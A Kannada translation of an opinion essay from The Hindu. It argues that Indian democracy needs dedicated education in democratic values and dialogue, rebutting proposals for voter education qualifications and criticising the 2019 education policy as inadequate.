ಜನತಂತ್ರ ಶಿಕ್ಷಣದ ಅಗತ್ಯ

ಈಗಿನ ಪರಿಸ್ಥಿತಿಯು ಪ್ರಜಾಪ್ರಭುತ್ವದ ಬೆಳವಣಿಗೆಗೆ ಪೂರಕವಾಗಿಲ್ಲ. ಬದಲಾಗಿ ಮಾರಕವೇ ಆಗಿದೆ. ಇದನ್ನು ಬದಲಾಯಿಸಬೇಕೆಂದರೆ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣ ಜಾರಿಗೆ ಬರಬೇಕು. ಇದನ್ನು ನಮ್ಮ ಪಠ್ಯಕ್ರಮದಲ್ಲಿ ಅಳವಡಿಸಿಕೊಳ್ಳಬೇಕು. ಹೊಸ ಶಿಕ್ಷಣ ನೀತಿಯಲ್ಲಿ ಇದರ ಪ್ರಸ್ತಾಪವಿದೆಯೇ ಹೊರತು ಹೆಚ್ಚಿನ ಕ್ರಮ ಇಲ್ಲ

ಕನ್ನಡಕ್ಕೆ: ವಸಂತ ನಾಡಿಗೇರ
ಸೌಜನ್ಯ: ದಿ ಹಿಂದೂ

ಜನರ ನಿರೀಕ್ಷೆಗಳನ್ನು ಪೂರೈಸಲು ನಮ್ಮ ಪ್ರಜಾಪ್ರಭುತ್ವವು ವಿಫಲವಾಗುತ್ತಿರುವುದಕ್ಕೆ ಸಾಕಷ್ಟು ಕಳವಳ ಉಂಟಾಗುತ್ತಿದೆ. ನಮಗೆ ಬೇಡವಾದ ಸಕಾರಗಳನ್ನು ಕಿತ್ತೆಸೆಯಲು ಚುನಾವಣೆಯು ಒಂದು ಅಸ್ತ್ರವಾಗಿದ್ದರೂ ಅದು ಬರಬರುತ್ತ ಕೇವಲ ‘ಕಾಗದದ ಕಲ್ಲಿನಂತೆ’ ಆಗಿಬಿಟ್ಟಿದೆ. ಏಕೆಂದರೆ ಈ ಪ್ರಕ್ರಿಯೆಯಿಂದ ಪರಿಣಾಮಕಾರಿ, ದಕ್ಷ ಹಾಗೂ ಒಳ್ಳೆಯ ಸರ್ಕಾರವನ್ನು ಆಯ್ಕೆಮಾಡಲು ನಮಗೆ ಸಾಧ್ಯವಾಗುತ್ತಿಲ್ಲ. ಈಗ ನಮ್ಮಿಂದ ಆಯ್ಕೆಯಾಗುತ್ತಿರುವವರಲ್ಲಿ ಅನೇಕರು ಅಪರಾಧ ಹಿನ್ನೆಲೆ ಉಳ್ಳವರು ಮತ್ತು ಭ್ರಷ್ಟರಾಗಿದ್ದು, ಉತ್ತಮ ಸರ್ಕಾರಕ್ಕೆ ಇದು ಅಡ್ಡಿಯೆನಿಸಿದೆ. ದೂರದರ್ಶಿತ್ವವಾಗಲೀ, ಜಾಣ್ಮೆಯಾಗಲೀ ಇಲ್ಲದಿರುವ, ಜನರ ಒಳಿತನ್ನು ಚಿಂತಿಸದೆ ಕೇವಲ ತಮ್ಮ ಸ್ವಾರ್ಥ ಸಾಧನೆಗೆ ಗಮನ ನೀಡುವ ಇಂಥವರನ್ನು ನಾವೇಕೆ ಸಹಿಸಿಕೊಳ್ಳಬೇಕು? ಸಾಮಥ್ರ್ಯ ಹಾಗೂ ಪ್ರತಿಭೆ ಇರುವ ಜನರೊಡನೆ ಯಾವುದೇ ಸಂಪರ್ಕ ಹೊಂದಿರದಂಥ ಜನನಾಯಕರು ನಮಗೇಕೆ ಬೇಕು?

ಉತ್ತಮ, ವಿವೇಕಯುತ ಸರ್ಕಾರ

ಆದರೆ ಇಂದಿನ ಈ ಸ್ಥಿತಿಗೆ ಕೆಲವು ಸಿನಿಕರ ವಾದಸರಣಿ ಹೀಗಿರುತ್ತದೆ: ಒಳ್ಳೆಯ ಆಡಳಿತದ ಗುರಿ ತಲುಪಲು ನಾವು ಅತ್ಯುತ್ತಮವಾದ ತಂಡವನ್ನು ಆಯ್ಕೆಮಾಡಬೇಕು. ಇಂಥ ತಂಡವು ಸಾರ್ವತ್ರಿಕ ಮತದಾನದ ಮೂಲಕ ಆಯ್ಕೆಯಾಗಕೂಡದು. ಬದಲಾಗಿ ಈ ಸ್ಥಾನಕ್ಕೆ ಸಮರ್ಥರಾದವರನ್ನು ಆರಿಸುವಂಥ ಬೌದ್ಧಿಕ ಸಂಪನ್ಮೂಲ ಹೊಂದಿರುವವರು ಮಾತ್ರ ಈ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ಭಾಗವಹಿಸಬೇಕು. ಏಕೆಂದರೆ, ಯಾವುದೇ ಅರ್ಹತಾ ಮಾನದಂಡವಿಲ್ಲದೆ ಕೇವಲ ಒಂದು ವ್ಯಕ್ತಿ, ಒಂದು ಮತದ ತತ್ತ್ವದ ಆಧಾರದಲ್ಲಿ ಎಲ್ಲರಿಗೂ ಮತದಾನದ ಹಕ್ಕು ನೀಡುವ ಈಗಿನ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಆಯ್ಕೆಯಾಗುವವರಿಂದ ಇದಕ್ಕಿಂತ ಹೆಚ್ಚಿನದೇನನ್ನೂ ನಿರೀಕ್ಷಿಸಲಾಗದು ಎಂಬುದು ಅವರ ಅಚಲ ನಿರ್ಧಾರ.

ಇದಕ್ಕೆ ಅವರು ಕ್ರಿಕೆಟ್ ಆಟದ ಹೋಲಿಕೆಯನ್ನು ನೀಡುತ್ತಾರೆ. ವಿಶ್ವಕಪ್ ಮೊದಲಾದ ಟೂರ್ನಮೆಂಟ್‍ಗೆ ಅತ್ಯುತ್ತಮ ತಂಡವನ್ನೇ ಆಯ್ಕೆಮಾಡಲಾಗುತ್ತದೆ. ಇದರ ಹಿಂದಿನ ಉದ್ದೇಶವಿಷ್ಟೆ. ಉತ್ತಮ ತಂಡವು ಉತ್ತಮ ಪ್ರದರ್ಶನ ನೀಡುವುದು ಮಾತ್ರವಲ್ಲದೆ ಅದಕ್ಕೆ ಕಪ್ ಗೆಲ್ಲುವ ಸಾಮಥ್ರ್ಯವಿರುತ್ತದೆ. ಇಂಥ ಚಾಂಪಿಯನ್ ತಂಡವನ್ನು ಆಯ್ಕೆಮಾಡುವವರಾದರೂ ಯಾರು? ಅದಕ್ಕೊಂದು ಆಯ್ಕೆ ಸಮಿತಿ ಇರುತ್ತದೆ. ಅವರೆಲ್ಲರೂ ತಜ್ಞರಾಗಿರುತ್ತಾರೆ. ಇದನ್ನು ನಮ್ಮ ಈಗಿನ ಆಯ್ಕೆ ಪದ್ಧತಿಯೊಡನೆ ಹೋಲಿಸಿ ನೋಡೋಣ.

ಈಗ ನಮ್ಮಲ್ಲಿರುವ ಸಾರ್ವತ್ರಿಕ ಮತದಾನದ ಮೂಲಕ ಉತ್ತಮ ಸರ್ಕಾರವನ್ನು ಆಯ್ಕೆಮಾಡುವುದು ನಮಗೆ ಸಾಧ್ಯವಾಗುತ್ತಿಲ್ಲ. ಹೀಗಿರುವಾಗ ನಾವೂ ಕ್ರಿಕೆಟ್‍ನ ಮಾದರಿಯನ್ನೇಕೆ ಅನುಸರಿಸಬಾರದು? ಸ್ಪಷ್ಟವಾಗಿ ಹೇಳಬೇಕು ಎಂದರೆ, ತಜ್ಞರ ತಂಡವೊಂದು ನಮ್ಮನ್ನಾಳುವ ಸರ್ಕಾರವನ್ನು ಆಯ್ಕೆಮಾಡುವುದು ಎಂದರ್ಥ.

ಉತ್ತಮ ಆಡಳಿತಗಾರರನ್ನು ಗುರುತಿಸಿ ಅಂಥವರನ್ನೇ ಆಯ್ಕೆಮಾಡುವಲ್ಲಿ ಶಿಕ್ಷಣವು ನೆರವಾಗುತ್ತದೆ ಎಂಬುದು ಅವರ ವಿಶ್ವಾಸ. ಹಾಗೆಂದು ಇದು ಸಾರ್ವತ್ರಿಕ ಮತದಾನ ಪದ್ಧತಿಯನ್ನೇ ತಿರಸ್ಕರಿಸುವುದಿಲ್ಲ. ಬದಲಾಗಿ ಮತದಾರರು ಸುಶಿಕ್ಷಿತರಾಗಿದ್ದರೆ ಒಳ್ಳೆಯವರ ಆಯ್ಕೆಯ ಸಾಧ್ಯತೆ ಹೆಚ್ಚು.

ಅಂದರೆ ಆ ಬಿಕ್ಕಟ್ಟನ್ನು ಹೀಗೆ ವಿಶ್ಲೇಷಿಸಬಹುದು: ನಮ್ಮಲ್ಲಿ ಈಗ ಜಾರಿಯಲ್ಲಿರುವ ಪ್ರಜಾಪ್ರಭುತ್ವ ಪದ್ಧತಿಯನುಸಾರ ಅಸ್ತಿತ್ವಕ್ಕೆ ಬಂದಿರುವಂಥ ಸರ್ಕಾರಗಳಿಂದ ದಕ್ಷ ಹಾಗೂ ವಿವೇಕಯುತ ಆಡಳಿತವನ್ನು ನಿರಿಕ್ಷಿಸುವುದು ಅಸಾಧ್ಯ. ಏಕೆಂದರೆ ಜನರಿಗೆ ಗುಣಮಟ್ಟದ ಬದುಕು ಸಾಗಿಸುವಂಥ ವ್ಯವಸ್ಥೆ ಕಲ್ಪಿಸುವಲ್ಲಿ ಅವರು ವಿಫಲರಾಗಿದ್ದಾರೆ. ಇಂತಿರುವಾಗ ಈ ರೀತಿಯ ಪ್ರಜಾಪ್ರಭುತ್ವ ವ್ಯವಸ್ಥೆಗೆ ಏಕೆ ತಿಲಾಂಜಲಿ ನೀಡಬಾರದು? ಅಥವಾ ಕನಿಷ್ಠಪಕ್ಷ ಮತದಾರರಿಗಾದರೂ ಒಂದು ಅರ್ಹತಾಮಟ್ಟವನ್ನೇಕೆ ಜಾರಿಗೆ ತರಬಾರದು?

ನಿರ್ದಿಷ್ಟ ಹಂತದ ಶಿಕ್ಷಣ ಪಡೆದವರು ಮಾತ್ರ ಮತದಾನ ಮಾಡಬಹುದು ಎಂಬುದು ಆ ಅರ್ಹತೆ. ಉತ್ತಮ ಆಡಳಿತಗಾರರನ್ನು ಗುರುತಿಸಿ ಅಂಥವರನ್ನೇ ಆಯ್ಕೆಮಾಡುವಲ್ಲಿ ಶಿಕ್ಷಣವು ನೆರವಾಗುತ್ತದೆ ಎಂಬುದು ಅವರ ವಿಶ್ವಾಸ. ಹಾಗೆಂದು ಇದು ಸಾರ್ವತ್ರಿಕ ಮತದಾನ ಪದ್ಧತಿಯನ್ನೇ ತಿರಸ್ಕರಿಸುವುದಿಲ್ಲ. ಬದಲಾಗಿ ಮತದಾರರು ಸುಶಿಕ್ಷಿತರಾಗಿದ್ದರೆ ಒಳ್ಳೆಯವರ ಆಯ್ಕೆಯ ಸಾಧ್ಯತೆ ಹೆಚ್ಚು. ಪ್ರಜಾಪ್ರಭುತ್ವ ಉಳಿದು ಬೆಳೆಯಬೇಕೆಂದರೆ ಮತದಾರರು ಸುಶಿಕ್ಷಿತರಾಗಿದ್ದರೆ ಚೆನ್ನ. ಮತದಾರರು ಹೆಚ್ಚು ಶಿಕ್ಷಿತರಾಗಿದ್ದಷ್ಟೂ ಉತ್ತಮ ಆಡಳಿತಗಾರರ ಆಯ್ಕೆಯ ಸಾಧ್ಯತೆ ಹೆಚ್ಚುತ್ತದೆ. ಇದು ಅಂತಿಮವಾಗಿ ಒಳ್ಳೆಯ ಆಡಳಿತಕ್ಕೆ ದಾರಿ ಮಾಡಿಕೊಡುತ್ತದೆ.

ಈ ರೀತಿಯ ವಾದಸರಣಿಯನ್ನು ಕೇಳಿದ ಮೆಲೆ ಒಂದು ಕ್ಷಣ ಹೌದಲ್ಲವೇ ಎಂಬ ಭಾವನೆ ಬರುವುದು ಸಹಜ. ಆದರೆ ಸ್ವಲ್ಪ ನಿಧಾನವಾಗಿ ಯೋಚಿಸಿದರೆ ಈ ಕಲ್ಪನೆಯೇ ಸರಿಯಲ್ಲ ಎಂಬುದೂ ನಿಜ. ಶಿಕ್ಷಣ ಹಾಗೂ ಸಾಕ್ಷರತೆಯಿಂದ ದೇಶದ ಕಲ್ಯಾಣವಾಗುತ್ತದೆ ಎಂಬ ವಾದದಲ್ಲಿ ಹುರುಳಿಲ್ಲ. ಏಕೆಂದರೆ, ಔಪಚಾರಿಕ ಶಿಕ್ಷಣವನ್ನೇ ಪಡೆಯದೆ ಅಶಿಕ್ಷಿತ ಎನಿಸಿಕೊಂಡ ಅನೇಕರು ಪ್ರಬುದ್ಧ ರಾಜಕಾರಣಿಗಳೂ ಉತ್ತಮ ನಾಗರಿಕರೂ ಆಗಿರುವ ಹಲವು ಉದಾಹರಣೆಗಳುಂಟು. ಹಾಗೆಯೇ ಅತ್ಯುನ್ನತ ಶಿಕ್ಷಣ ಪಡೆದೂ ಉತ್ತಮ ಆಡಳಿತ ನೀಡಲು ವಿಫಲರಾಗಿರುವಂಥ ಹಾಗೂ ಅನಾಗರಿಕರಂತೆ ವರ್ತಿಸುವ ಹಲವರನ್ನು ನಾವು ನೋಡಬಹುದು. ಅವರಲ್ಲನೇಕರು ಸ್ವಾರ್ಥಿಗಳೂ, ಜನತಂತ್ರವಿರೋಧಿಗಳೂ, ಸರ್ವಾಧಿಕಾರಿ ಮನೋಭಾವದವರೂ ಆಗಿರಬಹುದು. ಅಂದರೆ ಉನ್ನತ ಶಿಕ್ಷಣ ಪಡೆದವರು ಉತ್ತಮ ನಾಗರಿಕರು ಆಗಿರುತ್ತಾರೆ ಎಂಬ ಯಾವುದೇ ಖಾತರಿ ಇಲ್ಲ.

ಲ್ಲರಿಗೂ ಒಳ್ಳೆಯದಾಗುವ ಅಂಶಗಳನ್ನು ಗುರುತಿಸುವುದನ್ನು ನಾವು ಮೊದಲು ಕಲಿಯಬೇಕು. ಇದನ್ನು ವಿವರಿಸಿ ಹೇಳಬೇಕೆಂದರೆ, ಕೇವಲ ನನಗಷ್ಟೇ ಒಳ್ಳೆಯದು ಹಾಗೂ ಎಲ್ಲರಿಗೂ ಒಳಿತಾಗುವುದು -ಇವೆರಡರ ನಡುವಿನ ವ್ಯತ್ಯಾಸವನ್ನು ನಾವು ಗುರುತಿಸುವಂತಾಗಬೇಕು. ಹಾಗಾದರೆ ಸಕಲರಿಗೂ ಒಳಿತಾಗುವುದು ಎಂದರೆ ಏನು ಎಂಬುದು ಮುಂದಿನ ಪ್ರಶ್ನೆ.

ಅಲ್ಲಿಗೆ ಈ ಸಮಸ್ಯೆಗೆ ಏನು ಪರಿಹಾರ ಎಂಬುದನ್ನು ನಾವು ಯೋಚಿಸಬೆಕಾಗುತ್ತದೆ. ಕೇವಲ ಸಾಕ್ಷರತೆಯಿಂದ ಇದು ಬಗೆಹರಿಯುತ್ತದೆ ಎಂಬ ಕಲ್ಪನೆಯನ್ನು ಮೊದಲು ದೂರಮಾಡಬೇಕಾಗುತ್ತದೆ. ಇದಕ್ಕಾಗಿ ನಮ್ಮಲ್ಲಿ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣವನ್ನು ಜಾರಿಗೆ ತರುವ ಕೆಲಸ ಮೊದಲು ಆಗಬೇಕು. ನಮ್ಮ ಈಗಿನ ಪಠ್ಯಕ್ರಮದಲ್ಲಿ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣದ ಮೇಲೆ ಹೆಚ್ಚು ಗಮನ ಹರಿಸಿಲ್ಲ ಹಾಗೂ ಅದಕ್ಕೆ ಹೆಚ್ಚಿನ ಮಹತ್ವವನ್ನೂ ನೀಡಿಲ್ಲ. ಬೇರೆ ಮಾತಿನಲ್ಲಿ ಹೇಳುವುದಾದರೆ ನಮ್ಮ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಪ್ರಜಾಪ್ರಭುತ್ವ ಸಂಸ್ಕೃತಿ ಎಂಬುದೇ ಇಲ್ಲ.

ಮೂಲ ಧಾತುಗಳು

ಹಾಗಾದರೆ ನಮ್ಮ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣದ ಮೂಲ ಧಾತುಗಳು ಯಾವುವು ಎಂಬ ಪ್ರಶ್ನೆ ಎದುರಾಗುವುದು ಸಹಜ. ನಮ್ಮ ಜನರಲ್ಲಿ ಪ್ರಜಾಪ್ರಭುತ್ವದ ಮೌಲ್ಯಗಳನ್ನು ಹೆಚ್ಚಿಸುವ ಕೆಲಸದಿಂದ ಇದು ಆರಂಭವಾಗಬಹುದು. ಉದಾಹರಣೆಗೆ ಎಲ್ಲರಿಗೂ ಒಳ್ಳೆಯದಾಗುವ ಅಂಶಗಳನ್ನು ಗುರುತಿಸುವುದನ್ನು ನಾವು ಮೊದಲು ಕಲಿಯಬೇಕು. ಇದನ್ನು ವಿವರಿಸಿ ಹೇಳಬೇಕೆಂದರೆ, ಕೇವಲ ನನಗಷ್ಟೇ ಒಳ್ಳೆಯದು ಹಾಗೂ ಎಲ್ಲರಿಗೂ ಒಳಿತಾಗುವುದು -ಇವೆರಡರ ನಡುವಿನ ವ್ಯತ್ಯಾಸವನ್ನು ನಾವು ಗುರುತಿಸುವಂತಾಗಬೇಕು. ಹಾಗಾದರೆ ಸಕಲರಿಗೂ ಒಳಿತಾಗುವುದು ಎಂದರೆ ಏನು ಎಂಬುದು ಮುಂದಿನ ಪ್ರಶ್ನೆ. ನನಗೆ ಸರಿ ಎನಿಸಿದ ಅಂಶ ಇನ್ನೊಬ್ಬರಿಗೆ ಸರಿ ಎನಿಸಲಿಕ್ಕಿಲ್ಲ. ಅವರ ಕಲ್ಪನೆ ಸಂಪೂರ್ಣ ಬೇರೆಯದೇ ಆಗಿರಬಹುದು. ಆಗ, ಚರ್ಚೆ, ಸಂವಾದ, ಮಾತುಕತೆಯ ಮೂಲಕ ಅದನ್ನು ಸಾಧಿಸಬಹುದು.

ಗ್ರೀಕ್ ದೇಶದಲ್ಲಿ ‘ಪ್ಲಿನೆಕ್ಸಿಯಾ’ ಎಂಬ ಪದವೊಂದಿದೆ. ಎಲ್ಲವನ್ನೂ ತಾನೇ ಬಾಚಿಕೊಳ್ಳುವುದು, ತನ್ನ ಬಳಿ ಇರುವುದನ್ನು ಇತರರೊಂದಿಗೆ ಹಂಚಿಕೊಳ್ಳದಿರುವುದು, ಬೇರೆಯವರಿಗೆ ಸಲ್ಲಬೇಕಾದ ಗೌರವ, ಕೀರ್ತಿ ಇತ್ಯಾದಿಗಳನ್ನು ಒಪ್ಪಿಕೊಳ್ಳದೇ ಇರುವುದು, ತಾವು ಪಡೆದುದನ್ನು ಬೇರೆ ರೂಪದಲ್ಲಾದರೂ ಇತರರಿಗೆ ವಾಪಸು ನೀಡದಿರುವುದು -ಇದನ್ನು ಪ್ಲಿನೆಕ್ಸಿಯಾ ಎನ್ನುತ್ತಾರೆ.

ಸಮಾಜಕ್ಕೆ ಒಳಿತಾಗುವುದನ್ನು ಚಿಂತಿಸುವಾಗ ನಾವು ಈ ಪ್ಲಿನೆಕ್ಸಿಯಾಗೆ ಒಳಗಾಗಬಾರದು. ರಾಜಿ, ಪರಸ್ಪರ ಕೊಡುಕೊಳ್ಳುವಿಕೆಯೇ ಮೊದಲಾದ ಮನೋಭಾವವನ್ನು ಬೆಳೆಸಿಕೊಳ್ಳಬೇಕು. ಇದು ಸಾಧ್ಯವಾಗಬೇಕೆಂದರೆ ನಮ್ಮಲ್ಲಿ ಕೆಲವು ಗುಣಲಕ್ಷಣಗಳಿರಬೇಕಾಗುತ್ತದೆ. ಇತರರ ಅಭಿಪ್ರಾಯಗಳನ್ನು ತಾಳ್ಮೆಯಿಂದ ಆಲಿಸುವುದು, ಇತರರ ಸಂಕಷ್ಟಗಳನ್ನು ಸಹಾನುಭೂತಿಯಿಂದ ಕೇಳುವುದು ಹಾಗು ಎಲ್ಲಕ್ಕೂ ಮುಖ್ಯವಾಗಿ ಇತರರ ಅಭಿಪ್ರಾಯಗಳು ನಮಗೆ ಒಪ್ಪಿಗೆಯಾಗದಿದ್ದರೂ ಅವರೊಡನೆ ಮಾತುಕತೆ ನಡೆಸುವ ಬದ್ಧತೆ ಪ್ರದರ್ಶಿಸುವುದು -ಇವು ಪ್ಲಿನೆಕ್ಸಿಯಾಗಿಂತ ಭಿನ್ನವಾಗಿ ನಿಲ್ಲುವ ಕೆಲ ಅಂಶಗಳು.

ಇದೆಲ್ಲಕ್ಕಿಂತ ಮುಖ್ಯವಾದ ಇನ್ನೊಂದು ಸಂಗತಿ ಎಂದರೆ ಸತತ ಸಂವಾದಲ್ಲಿ ತೊಡಗುವುದು. ರಾಜಕೀಯ ತಜ್ಞ ಜೆರೆಮಿ ವೆಬ್ಬರ್ ಅವರ ಮಾತಿನಲ್ಲಿ ಹೇಳಬೇಕೆಂದರೆ ಒಂದು ನಿರ್ದಿಷ್ಟ ವಿಷಯದಲ್ಲಿ ಕಾಲಕಾಲಕ್ಕೆ ಚರ್ಚೆ ನಡೆಸುವುದು ಎಂದರ್ಥ.

ಯಾವುದೇ ವಿಷಯಗಳನ್ನು ರಾಜಕೀಯ ನಾಯಕರು ಚರ್ಚೆಯೆಂಬ ಮೂಸೆಯೊಳಗಿಟ್ಟು ಪರೀಕ್ಷಿಸಿದರೆ ಉತ್ತಮ ಪರಿಹಾರ, ಸಲಹೆ, ಸೂಚನೆಗಳು ಹೊರಹೊಮ್ಮುವುದು ಸಾಧ್ಯ. ನಿರ್ದಿಷ್ಟ ವಿಷಯವೊಂದು ದೊಡ್ಡ ಸಮಸ್ಯೆಯಾಗಿ ಕಾಡತೊಡಗಿ, ಪರಿಹಾರ ಎಂಬುದು ಮರೀಚಿಕೆಯಾದಾಗ ಅದಕ್ಕೆ ಸತತ ಚರ್ಚೆಯೇ ಪರಿಹಾರವಾಗಬಲ್ಲದು. ಉದಾಹರಣೆಗೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ ಧರ್ಮ, ಜಾತಿ, ಲಿಂಗ ಮೊದಲಾದವು ಸದಾ ಚರ್ಚೆಯ ವಿಷಯ. ಇಂಥ ವಿಷಯಗಳು ನಮ್ಮ ಸಂಸತ್ತಿನಲ್ಲಿ ಚರ್ಚೆಗೆ ಬಂದಾಗ, ಬಹುತೇಕ ಸಂದರ್ಭಗಳಲ್ಲಿ, ಭಾವನಾತ್ಮಕವಾಗಿ ಹಾಗೂ ತಿಳಿವಳಿಕೆ ಇಲ್ಲದೆ ತಮ್ಮ ಮೂಗಿನ ನೇರಕ್ಕೆ ನಮ್ಮ ಪ್ರತಿನಿಧಿಗಳು ಮಾತನಾಡುವುದುಂಟು. ಇದರ ಬದಲಾಗಿ ಈ ಜನಪ್ರತಿನಿಧಿಗಳು ಸುಶಿಕ್ಷಿತರಾಗಿದ್ದು, ಈ ವಿಷಯಗಳ ಬಗ್ಗೆ ತಿಳಿವಳಿಕೆ, ಜ್ಞಾನ ಇದ್ದರೆ ಅವರ ಚರ್ಚೆ, ವಾದಸರಣಿ ಬೇರೆಯದೇ ರಿತಿಯಲ್ಲಿರಬಹುದು. ಇಲ್ಲಿಯೇ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣದ ಅಗತ್ಯ ಮತ್ತು ಮಹತ್ವ ಬರೋದು.

ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣವೆಂದರೆ ನಮ್ಮ ಸಮಾಜ ಹಾಗೂ ಇತಿಹಾಸದ ಜ್ಞಾನ ಇರುವುದು. ಅದರ ಬಹುಸಂಸ್ಕೃತಿ, ಬೌದ್ಧಿಕ ಹಾಗೂ ಧಾರ್ಮಿಕ ಸಂಪ್ರದಾಯ ಇತ್ಯಾದಿಗಳ ಅರಿವು ಇರುವುದು ಎಂದಾಗುತ್ತದೆ. ನಮ್ಮ ಸಮಾಜದ ಸಂಕೀರ್ಣ ಸಮಸ್ಯೆಗಳ ಪಥವನ್ನು ತಿಳಿದುಕೊಳ್ಳುವುದು ನನಗೆ ಇನ್ನೂ ಸಾಧ್ಯವಾಗಿಲ್ಲ. ಉನ್ನತ ಶಿಕ್ಷಣ ಪಡೆದ ಅನೇಕರಿಗೆ ಅಲ್ಪಸಂಖ್ಯಾತರ ಬಗ್ಗೆ ಸರಿಯಾದ ಕಲ್ಪನೆ ಹಾಗೂ ಮಾಹಿತಿ ಇಲ್ಲದಿರುವುದಕ್ಕೆ ನನಗೆ ಖೇದವೆನಿಸುತ್ತದೆ. ಸಾಂವಿಧಾನಿಕವಾಗಿ ಈ ಧಾರ್ಮಿಕ ಅಲ್ಪಸಂಖ್ಯಾತರು ಅತಿ ಕಡಿಮೆ ಸಂಖ್ಯೆಯಲ್ಲಿದ್ದಾರೆ ಎಂಬ ಅಂಶ ಮಾತ್ರ ಇವರಿಗೆ ಗೊತ್ತು. ಆದರೆ ಅವರು ಅನುಭವಿಸುತ್ತಿರುವ ಇತರ ಅನೇಕ ಸಂಕಷ್ಟಗಳ ಅರಿವೇ ಇವರಿಗೆ ಇಲ್ಲ. ಉದಾಹರಣೆಗೆ, ಧಾರ್ಮಿಕ ಅಲ್ಪಸಂಖ್ಯಾತರಿಗೆ ಶಿಕ್ಷಣ ಹಾಗೂ ಉದ್ಯೋಗದಲ್ಲಿ ಮೀಸಲಾತಿ ಇದೆ ಎಂಬುದು ಇವರ ಭಾವನೆ; ನಮ್ಮ ಜಟಿಲ ಜಾತಿ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ಇಂದಿಗೂ ಸಾಕಷ್ಟು ಅಜ್ಞಾನವಿದೆ; ಜಾತ್ಯತೀತತೆಯು ಪಾಶ್ಚ್ಯಾತ್ಯ ಕಲ್ಪನೆ ಎಂದೇ ಬಹುತೇಕರು ಭಾವಿಸಿದ್ದಾರೆ. ಆದರೆ ಧರ್ಮವು ಅವರ ಪಾಲಿಗೆ ದೇಸಿ ಕಲ್ಪನೆ. ಈ ರೀತಿಯ ತಪ್ಪು ತಿಳಿವಳಿಕೆಗಳನ್ನು ಸರಿಯಾದ, ಸೂಕ್ತವಾದ ಪ್ರಜಾಪ್ರಭುತ್ವ ಪಾಠಗಳಿಂದ ಮಾತ್ರವೇ ಹೋಗಲಾಡಿಸುವುದು ಸಾಧ್ಯ.

ಹಾಗಾದರೆ ಪ್ರಜಾಪ್ರಭುತ್ವದ ಪಾಠ ಎಂದರೇನು? ವಿಶಾಲ ಅರ್ಥದಲ್ಲಿ ಹೇಳುವುದಾದರೆ, ಒಂದು ನಿರ್ದಿಷ್ಟ ಜನಸಮೂಹದಲ್ಲಿ ನಡೆಯುವ ಚರ್ಚೆ ನಡೆಸುವ ನಿರ್ದಿಷ್ಟ ಪ್ರಯತ್ನವಿದು.

ಇದಕ್ಕೊಂದು ನಿರ್ದಿಷ್ಟ ರಾಜಕೀಯ ಭಾಷೆ, ನಿರ್ದಿಷ್ಟ ಪದಬಳಕೆ ಇರುತ್ತದೆ. ಒಂದು ಜನಸಮುದಾಯದ ಮಧ್ಯೆ ಸಂವಾದವನ್ನು ಸಾಧ್ಯವಾಗಿಸುವ ಖಚಿತ ಉದ್ದೇಶದಿಂದ ಇದನ್ನು ರೂಪಿಸಲಾಗಿದೆ. ಸಾರ್ವಜನಿಕ ಹಿತಾಸಕ್ತಿ ಸಂಬಂಧಿತ ಯಾವುದೇ ವಿಷಯ ಕುರಿತು ನಡೆಯುವ ಸಂವಾದದಲ್ಲಿ ಸಾಧ್ಯವಿರುವಮಟ್ಟಿಗೆ ಸಮ್ಮತಿ ಮೂಡಿಸುವುದು, ಅದು ಸಾಧ್ಯವಿಲ್ಲದಿರುವ ಸಂದರ್ಭದಲ್ಲಿ ಒಪ್ಪದೆಯೂ ಪರಸ್ಪರರ ನಿಲುವನ್ನು ಗೌರವಿಸುವಂಥ ಸೌಹಾರ್ದಯುತ ವಾತಾವರಣ ನಿರ್ಮಿಸುವುದು ಇದರ ಒಟ್ಟು ಉದ್ದೇಶ ಮತ್ತು ಆಶಯ. ಸಂಕ್ಷಿಪ್ತವಾಗಿ ಹೇಳಬೇಕೆಂದರೆ, ಇದು ಸಾಮಾಜಿಕ ಮತ್ತು ಐತಿಹಾಸಿಕ ಜಾಗೃತಿ ಮೂಡಿಸುವ ಹಾಗೂ ಪ್ರಜಾಪ್ರಭುತ್ವದ ಪ್ರಮುಖ ಮೌಲ್ಯಗಳ ಬಗ್ಗೆ ಅರಿವು ಮೂಡಿಸುವುದಾಗಿದೆ.

ಈ ರೀತಿಯ ಸಂವಾದ, ಚರ್ಚೆಗಳಿಂದ ಹೊರಹೊಮ್ಮುವ ಅನೇಕ ಅರಿಮೆಗಳು ಹಾಗೂ ಮೌಲ್ಯಗಳನ್ನು ಮುಕ್ತ ಕಲಾ ಶಿಕ್ಷಣದಲ್ಲಿ ಅಳವಡಿಸಬಹುದಾಗಿದೆ. 2019ರ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯಲ್ಲಿ ಈ ಅಂಶವನ್ನು ಪರಿಗಣಿಸಲಾಗಿದೆ. ಆದರೆ ವಿಷಾದದ ವಿಷಯವೇನೆಂದರೆ ಅದು ಅಸಮರ್ಪಕವಾಗಿದೆ. ನಾನು ನನ್ನ ತಿಳಿವಳಿಕೆಯ ಚೌಕಟ್ಟಿನಲ್ಲಿ ಇದನ್ನು ಓದಿಕೊಂಡಿದ್ದು, ಇದರ ಪ್ರಕಾರ ಇದು ಪ್ರಜಾಪ್ರಭುತ್ವಕ್ಕೆ ಹೇಗೆ ಸಂಬಂಧಹೊಂದಿದೆ ಎಂಬುದರ ವಿವರ ಹಾಗೂ ವಿವರಣೆ ಅದರಲ್ಲಿಲ್ಲ. ಈ ರೀತಿ ಪಠ್ಯಕ್ರಮದಲ್ಲಿ ಚೂರುಪಾರು ಸಂಗತಿಗಳನ್ನು ತುರುಕುವುದರಿಂದ ಪ್ರಜಾಪ್ರಭುತ್ವ ಶಿಕ್ಷಣಕ್ಕೆ ಯಾವುದೇ ನ್ಯಾಯವನ್ನು ಒದಗಿಸಿದಂತಾಗುವುದಿಲ್ಲ.

